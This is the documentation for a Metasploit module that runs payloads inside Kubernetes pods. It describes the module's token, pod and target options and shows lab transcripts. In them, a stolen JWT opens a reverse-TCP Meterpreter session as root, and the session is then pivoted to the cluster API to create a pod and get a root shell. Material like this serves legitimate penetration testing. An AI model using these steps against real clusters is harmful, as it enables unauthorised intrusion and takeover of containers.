## Vulnerable Application ### Description Execute a payload within a Kubernetes pod. ## Verification Steps 1. Start msfconsole 2. Do: `use exploit/multi/kubernetes/exec` 3. Set the required options 4. Do: `run` 5. You should get a shell. ## Options ### SESSION An optional session to use for configuration. When specified, the values of `NAMESPACE`, `TOKEN`, `RHOSTS` and `RPORT` will be gathered from the session host. This requires that the session be on an existing Kubernetes pod. The necessary values may not always be present. Setting this option will also automatically route connections through the specified session. ### TOKEN The JWT token. The token with the necessary privileges to access the exec endpoint within a running pod and optionally create a new pod. ### POD The pod name to execute in. When not specified, a new pod will be created with an entrypoint that allows it to run forever. After creation, the pod will be used to execute the payload. **The created pod is not automatically cleaned up.** A note containing the created pod's information will be added to the database when it is connected. ### NAMESPACE The Kubernetes namespace that the `TOKEN` has permissions for and that `POD` either exists in or should be created in. ### SHELL The shell to use for execution. `bash` is likely preferred from a usability perspective, but is not present as often as `sh` is. ### PodName *This is an advanced option.* The image from which to create the pod. When a new pod is created (`POD` is blank), this option can be used to specify the image that is used. If this option is blank, each image will be tried from the list of running pods until one successfully starts. ### TARGET #### Interactive WebSocket Communicate directly with the pod using the Kubernetes WebSocket API. This is the most similar option to the `kubectl exec --stdin --tty` command. No Metasploit payload is transferred to the target. ### Unix Command Run the specified command payload and read the output. Custom commands can be run with the `cmd/unix/generic` payload. ### Linux Dropper Use a command stager to transfer a Metasploit payload to the target and execute it. This will result in the payload being written to disk and will require potentially non-standard binaries to be present on the remote system, depending on the selected `CMDSTAGER::FLAVOR` option. ### Python Run a Python payload on the remote host. This technique will automatically find and use either a `python`, `python3`, or `python2` binary on the remote system to use for execution. ## Scenarios ### Kubernetes v1.22.1 In this scenario, Metasploit has direct access to the Kubernetes API. A known token is used to execute a Python payload within the `thinkphp-67f7c88cc9-tgpfh` pod. ``` msf > use exploit/multi/kubernetes/exec [*] Using configured payload python/meterpreter/reverse_tcp msf exploit(multi/kubernetes/exec) > set TOKEN eyJhbGciOiJSUzI1... TOKEN => eyJhbGciOiJSUzI1... msf exploit(multi/kubernetes/exec) > set POD thinkphp-67f7c88cc9-tgpfh POD => thinkphp-67f7c88cc9-tgpfh msf exploit(multi/kubernetes/exec) > set RHOSTS 192.168.159.31 RHOSTS => 192.168.159.31 msf exploit(multi/kubernetes/exec) > set TARGET Python TARGET => Python msf exploit(multi/kubernetes/exec) > set PAYLOAD python/meterpreter/reverse_tcp PAYLOAD => python/meterpreter/reverse_tcp msf exploit(multi/kubernetes/exec) > run [*] Started reverse TCP handler on 192.168.159.128:4444 [*] Sending stage (39736 bytes) to 192.168.159.31 [*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.31:59234) at 2021-10-01 09:55:00 -0400 meterpreter > getuid Server username: root meterpreter > sysinfo Computer : thinkphp-67f7c88cc9-tgpfh OS : Linux 5.4.0-88-generic #99-Ubuntu SMP Thu Sep 23 17:29:00 UTC 2021 Architecture : x64 Meterpreter : python/linux meterpreter > background [*] Backgrounding session 1... msf exploit(multi/kubernetes/exec) > ``` Next, the compromised session is used to access the internal Kubernetes endpoint, create a new pod and open a shell directly via a WebSocket. ``` msf exploit(multi/kubernetes/exec) > set TARGET Interactive\ WebSocket TARGET => Interactive WebSocket msf exploit(multi/kubernetes/exec) > run RHOST="" RPORT="" POD="" SESSION=-1 [*] Routing traffic through session: 1 [+] Kubernetes service host: 10.96.0.1:443 [*] Using image: busybox [+] Pod created: burhgvzc [*] Waiting for the pod to be ready... [+] Successfully established the WebSocket [*] Found shell. [*] Command shell session 2 opened (172.17.0.31:59437 -> 10.96.0.1:443) at 2021-10-01 10:05:57 -0400 id uid=0(root) gid=0(root) groups=10(wheel) pwd / ```